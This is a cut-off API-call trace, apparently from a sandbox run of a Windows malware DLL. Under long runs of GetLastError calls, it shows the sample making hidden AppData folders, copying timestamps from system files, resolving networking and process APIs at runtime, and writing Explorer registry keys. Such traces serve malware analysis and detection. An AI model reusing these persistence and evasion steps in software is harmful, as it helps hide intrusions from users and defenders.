GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.244] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.244] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.244] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.244] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.244] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.244] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.244] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.244] GetLastError () returned 0x0 [0032.244] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.251] GetLastError () returned 0x0 [0032.251] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.252] SetLastError (dwErrCode=0x0) [0032.252] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.253] SetLastError (dwErrCode=0x0) [0032.253] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.254] SetLastError (dwErrCode=0x0) [0032.254] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.255] GetLastError () returned 0x0 [0032.255] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.256] SetLastError (dwErrCode=0x0) [0032.256] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.257] SetLastError (dwErrCode=0x0) [0032.257] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.258] GetLastError () returned 0x0 [0032.258] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.259] SetLastError (dwErrCode=0x0) [0032.259] GetLastError () returned 0x0 [0032.260] SetLastError (dwErrCode=0x0) [0032.260] GetLastError () returned 0x0 [0032.260] SetLastError (dwErrCode=0x0) [0032.260] GetLastError () returned 0x0 [0032.260] SetLastError (dwErrCode=0x0) [0032.260] GetLastError () returned 0x0 [0032.260] SetLastError (dwErrCode=0x0) [0032.260] GetLastError () returned 0x0 [0032.260] SetLastError (dwErrCode=0x0) [0032.260] GetLastError () returned 0x0 [0032.260] SetLastError (dwErrCode=0x0) [0032.260] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.261] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.261] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.262] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f9b0 | out: lpSystemTimeAsFileTime=0x20f9b0*(dwLowDateTime=0xe0f4a970, dwHighDateTime=0x1d3dfba)) [0032.262] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f8e8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.262] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f7d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.262] GetLastError () returned 0x0 [0032.263] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.263] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.263] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.263] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.263] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.263] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.263] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.263] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.263] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.263] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.263] GetLastError () returned 0xb7 [0032.263] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.263] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.263] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.263] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.263] wsprintfA (in: param_1=0x20f650, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.263] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.263] wsprintfA (in: param_1=0x20f54c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.264] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.264] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.264] CloseHandle (hObject=0x74) returned 1 [0032.264] GetLastError () returned 0x0 [0032.264] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.264] GetLastError () returned 0x0 [0032.264] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.264] GetSystemDirectoryA (in: lpBuffer=0x20f650, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.264] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.264] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.264] CloseHandle (hObject=0x74) returned 1 [0032.264] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.265] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.265] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.266] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.266] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.266] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.266] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.266] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.266] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.266] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.266] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.266] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.266] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.267] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.268] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.268] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.268] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.268] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.268] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.268] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.268] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.268] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.268] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.269] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.269] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.269] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.269] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.269] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.269] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.269] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.269] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.269] AddAtomT () returned 0x0 [0032.269] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x20fb84, lpdwDisposition=0x20fb88 | out: phkResult=0x20fb84*=0x78, lpdwDisposition=0x20fb88*=0x2) returned 0x0 [0032.270] CloseHandle (hObject=0x78) returned 1 [0032.270] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0032.270] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x20fbd0, lpdwDisposition=0x20fc88 | out: phkResult=0x20fbd0*=0x7c, lpdwDisposition=0x20fc88*=0x2) returned 0x0 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1ed94, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1ed98, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1ed9c, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1eda4, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x20fbcc*=0x4) returned 0x2 [0032.270] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x20fbd4, lpData=0x72f1eda8, lpcbData=0x20fbcc*=0x4 | out: lpType=0x20fbd4*=0x0, 